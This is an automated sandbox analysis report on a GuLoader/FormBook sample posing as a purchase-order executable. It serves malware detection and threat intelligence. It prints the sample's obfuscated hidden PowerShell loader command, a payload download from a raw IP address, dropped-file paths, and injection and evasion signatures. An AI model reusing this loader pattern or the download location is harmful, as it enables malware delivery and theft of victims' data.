Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO. A-72 9234567.exe

Overview

General Information

Sample name:PO. A-72 9234567.exe
Analysis ID:1572258
MD5:3454df1e0ac8785872448aa049b8d91e
SHA1:05c146fe06c33b2af95992c74baf58aa1972ce8f
SHA256:f0472b2ee2791d7da13d5549f157624efd81f3d17198cce9378f5f6cfe2c8850
Tags:exeuser-lowmal3
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • PO. A-72 9234567.exe (PID: 760 cmdline: "C:\Users\user\Desktop\PO. A-72 9234567.exe" MD5: 3454DF1E0AC8785872448AA049B8D91E)
    • powershell.exe (PID: 5160 cmdline: powershell.exe -windowstyle hidden "$Forvaltningslovens=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Sttemder73.Uns';$Passagerskibe=$Forvaltningslovens.SubString(72100,3);.$Passagerskibe($Forvaltningslovens) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Notanencephalia.exe (PID: 7876 cmdline: "C:\Users\user\AppData\Local\Temp\Notanencephalia.exe" MD5: 3454DF1E0AC8785872448AA049B8D91E)
  • svchost.exe (PID: 8152 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.3372446801.000000001F9D0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.3116482751.000000000AE52000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Suspicious Script Execution From Temp Folder
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -windowstyle hidden "$Forvaltningslovens=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Sttemder73.Uns';$Passagerskibe=$Forvaltningslovens.SubString(72100,3);.$Passagerskibe($Forvaltningslovens), CommandLine: powershell.exe -windowstyle hidden "$Forvaltningslovens=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Sttemder73.Uns';$Passagerskibe=$Forvaltningslovens.SubString(72100,3);.$Passagerskibe($Forvaltningslovens), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO. A-72 9234567.exe", ParentImage: C:\Users\user\Desktop\PO. A-72 9234567.exe, ParentProcessId: 760, ParentProcessName: PO. A-72 9234567.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Forvaltningslovens=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Sttemder73.Uns';$Passagerskibe=$Forvaltningslovens.SubString(72100,3);.$Passagerskibe($Forvaltningslovens), ProcessId: 5160, ProcessName: powershell.exe
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Forvaltningslovens=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Sttemder73.Uns';$Passagerskibe=$Forvaltningslovens.SubString(72100,3);.$Passagerskibe($Forvaltningslovens), CommandLine: powershell.exe -windowstyle hidden "$Forvaltningslovens=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Sttemder73.Uns';$Passagerskibe=$Forvaltningslovens.SubString(72100,3);.$Passagerskibe($Forvaltningslovens), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO. A-72 9234567.exe", ParentImage: C:\Users\user\Desktop\PO. A-72 9234567.exe, ParentProcessId: 760, ParentProcessName: PO. A-72 9234567.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Forvaltningslovens=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Sttemder73.Uns';$Passagerskibe=$Forvaltningslovens.SubString(72100,3);.$Passagerskibe($Forvaltningslovens), ProcessId: 5160, ProcessName: powershell.exe
      Sigma detected: Windows Processes Suspicious Parent Directory
      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8152, ProcessName: svchost.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-10T10:33:50.166155+010028032702Potentially Bad Traffic192.168.2.649967212.162.149.8980TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeReversingLabs: Detection: 21%
      Multi AV Scanner detection for submitted file
      Source: PO. A-72 9234567.exeReversingLabs: Detection: 21%
      Yara detected FormBook
      Source: Yara matchFile source: 0000000E.00000002.3372446801.000000001F9D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Machine Learning detection for dropped file
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeJoe Sandbox ML: detected
      Machine Learning detection for sample
      Source: PO. A-72 9234567.exeJoe Sandbox ML: detected
      Source: PO. A-72 9234567.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: PO. A-72 9234567.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: wntdll.pdbUGP source: Notanencephalia.exe, 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Notanencephalia.exe, 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmp, Notanencephalia.exe, 0000000E.00000003.3314246777.000000001F9D7000.00000004.00000020.00020000.00000000.sdmp, Notanencephalia.exe, 0000000E.00000003.3316271260.000000001FB8F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: Notanencephalia.exe, Notanencephalia.exe, 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Notanencephalia.exe, 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmp, Notanencephalia.exe, 0000000E.00000003.3314246777.000000001F9D7000.00000004.00000020.00020000.00000000.sdmp, Notanencephalia.exe, 0000000E.00000003.3316271260.000000001FB8F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: stem.Core.pdb source: powershell.exe, 00000002.00000002.3112960418.0000000008A49000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000002.00000002.3097443257.0000000003079000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeCode function: 0_2_0040689E FindFirstFileW,FindClose,0_2_0040689E
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeCode function: 0_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C4D
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49967 -> 212.162.149.89:80
      Source: global trafficHTTP traffic detected: GET /KSMZNlmay152.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.89Cache-Control: no-cache
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
      Source: global trafficHTTP traffic detected: GET /KSMZNlmay152.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.89Cache-Control: no-cache
      Source: Notanencephalia.exe, 0000000E.00000002.3360242550.00000000040D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.89/
      Source: Notanencephalia.exe, 0000000E.00000002.3360242550.0000000004098000.00000004.00000020.00020000.00000000.sdmp, Notanencephalia.exe, 0000000E.00000002.3372119761.000000001F1F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.89/KSMZNlmay152.bin
      Source: Notanencephalia.exe, 0000000E.00000002.3360242550.0000000004098000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.89/KSMZNlmay152.bin(
      Source: Notanencephalia.exe, 0000000E.00000002.3360242550.0000000004098000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.89/KSMZNlmay152.binp
      Source: powershell.exe, 00000002.00000002.3103991276.00000000077F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mi
      Source: svchost.exe, 0000000B.00000002.3417307334.0000022D74000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
      Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
      Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
      Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
      Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
      Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
      Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
      Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
      Source: qmgr.db.11.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
      Source: PO. A-72 9234567.exe, Notanencephalia.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: powershell.exe, 00000002.00000002.3102158984.000000000624B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000002.00000002.3099047054.0000000005337000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3103991276.00000000077F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000002.00000002.3099047054.0000000005337000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 00000002.00000002.3099047054.00000000051E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000002.00000002.3099047054.0000000005337000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000002.00000002.3099047054.0000000005337000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3103991276.00000000077F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000002.00000002.3112960418.0000000008A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
      Source: powershell.exe, 00000002.00000002.3099047054.00000000051E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
      Source: powershell.exe, 00000002.00000002.3099047054.0000000005337000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: powershell.exe, 00000002.00000002.3102158984.000000000624B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000002.00000002.3102158984.000000000624B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000002.00000002.3102158984.000000000624B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: qmgr.db.11.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
      Source: svchost.exe, 0000000B.00000003.2466483235.0000022D73E50000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
      Source: powershell.exe, 00000002.00000002.3099047054.0000000005337000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3103991276.00000000077F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000002.00000002.3102158984.000000000624B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeCode function: 0_2_00405705 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405705

      E-Banking Fraud

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 0000000E.00000002.3372446801.000000001F9D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Powershell drops PE file
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB35C0 NtCreateMutant,LdrInitializeThunk,14_2_1FDB35C0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB2DF0 NtQuerySystemInformation,LdrInitializeThunk,14_2_1FDB2DF0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB2C70 NtFreeVirtualMemory,LdrInitializeThunk,14_2_1FDB2C70
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB2B60 NtClose,LdrInitializeThunk,14_2_1FDB2B60
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB3D70 NtOpenThread,14_2_1FDB3D70
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB3D10 NtOpenProcessToken,14_2_1FDB3D10
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB39B0 NtGetContextThread,14_2_1FDB39B0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB3090 NtSetValueKey,14_2_1FDB3090
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB3010 NtOpenDirectoryObject,14_2_1FDB3010
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB2FE0 NtCreateFile,14_2_1FDB2FE0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB2F90 NtProtectVirtualMemory,14_2_1FDB2F90
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB2FB0 NtResumeThread,14_2_1FDB2FB0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB2FA0 NtQuerySection,14_2_1FDB2FA0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB2F60 NtCreateProcessEx,14_2_1FDB2F60
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB2F30 NtCreateSection,14_2_1FDB2F30
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB2EE0 NtQueueApcThread,14_2_1FDB2EE0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB2E80 NtReadVirtualMemory,14_2_1FDB2E80
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB2EA0 NtAdjustPrivilegesToken,14_2_1FDB2EA0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB2E30 NtWriteVirtualMemory,14_2_1FDB2E30
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB2DD0 NtDelayExecution,14_2_1FDB2DD0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB2DB0 NtEnumerateKey,14_2_1FDB2DB0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB2D10 NtMapViewOfSection,14_2_1FDB2D10
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB2D00 NtSetInformationFile,14_2_1FDB2D00
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB2D30 NtUnmapViewOfSection,14_2_1FDB2D30
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB2CC0 NtQueryVirtualMemory,14_2_1FDB2CC0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB2CF0 NtOpenProcess,14_2_1FDB2CF0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB2CA0 NtQueryInformationToken,14_2_1FDB2CA0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB2C60 NtCreateKey,14_2_1FDB2C60
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB2C00 NtQueryInformationProcess,14_2_1FDB2C00
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB2BF0 NtAllocateVirtualMemory,14_2_1FDB2BF0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB2BE0 NtQueryValueKey,14_2_1FDB2BE0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB2B80 NtQueryInformationFile,14_2_1FDB2B80
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB2BA0 NtEnumerateValueKey,14_2_1FDB2BA0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB2AD0 NtReadFile,14_2_1FDB2AD0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB2AF0 NtWriteFile,14_2_1FDB2AF0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB2AB0 NtWaitForSingleObject,14_2_1FDB2AB0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB4650 NtSuspendThread,14_2_1FDB4650
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB4340 NtSetContextThread,14_2_1FDB4340
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeCode function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040351C
      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeCode function: 0_2_00406C5F0_2_00406C5F
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04C9C6452_2_04C9C645
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04C9B4CF2_2_04C9B4CF
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04C915052_2_04C91505
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD43FD514_2_1FD43FD5
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD43FD214_2_1FD43FD2
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD81F9214_2_1FD81F92
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE3FFB114_2_1FE3FFB1
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE3FF0914_2_1FE3FF09
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD89EB014_2_1FD89EB0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9FDC014_2_1FD9FDC0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE37D7314_2_1FE37D73
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD83D4014_2_1FD83D40
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE31D5A14_2_1FE31D5A
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE3FCF214_2_1FE3FCF2
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDF9C3214_2_1FDF9C32
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDBDBF914_2_1FDBDBF9
